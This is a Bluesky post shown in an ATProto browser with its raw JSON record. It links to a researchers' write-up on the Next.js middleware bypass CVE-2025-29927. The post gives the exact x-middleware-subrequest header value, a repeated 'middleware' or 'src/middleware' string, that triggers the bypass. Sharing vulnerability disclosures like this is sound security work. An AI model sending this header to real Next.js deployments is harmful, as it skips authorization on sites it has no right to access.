ATProto Browser
Experimental browser for the Atmosphere
Experimental browser for the Atmosphere
The researchers who found the Next.js bug (CVE-2025-29927) have released the full paper: Set x-middleware-subrequest to middleware:middleware:middleware:middleware:middleware OR src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
Mar 23, 2025, 5:44 PM
{
"uri": "at://did:plc:rzrcljpec5e52wvcacwxds4w/app.bsky.feed.post/3ll2s7xc57322",
"cid": "bafyreibynpddp3eq37ef42h3bauxggwlzbdoxgpgicqxasu77ctoad774y",
"value": {
"text": "The researchers who found the Next.js bug (CVE-2025-29927) have released the full paper:\n\nSet x-middleware-subrequest to\nmiddleware:middleware:middleware:middleware:middleware OR \nsrc/middleware:src/middleware:src/middleware:src/middleware:src/middleware",
"$type": "app.bsky.feed.post",
"embed": {
"$type": "app.bsky.embed.external",
"external": {
"uri": "https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware",
"thumb": {
"$type": "blob",
"ref": {
"$link": "bafkreifl37dakdavm3zslrc7nur75coqajvp7u34fjtkbrib5dndnoadha"
},
"mimeType": "image/png",
"size": 906095
},
"title": "Next.js and the corrupt middleware: the authorizing artifact",
"description": "CVE-2025-29927"
}
},
"createdAt": "2025-03-23T17:44:56.757Z"
}
}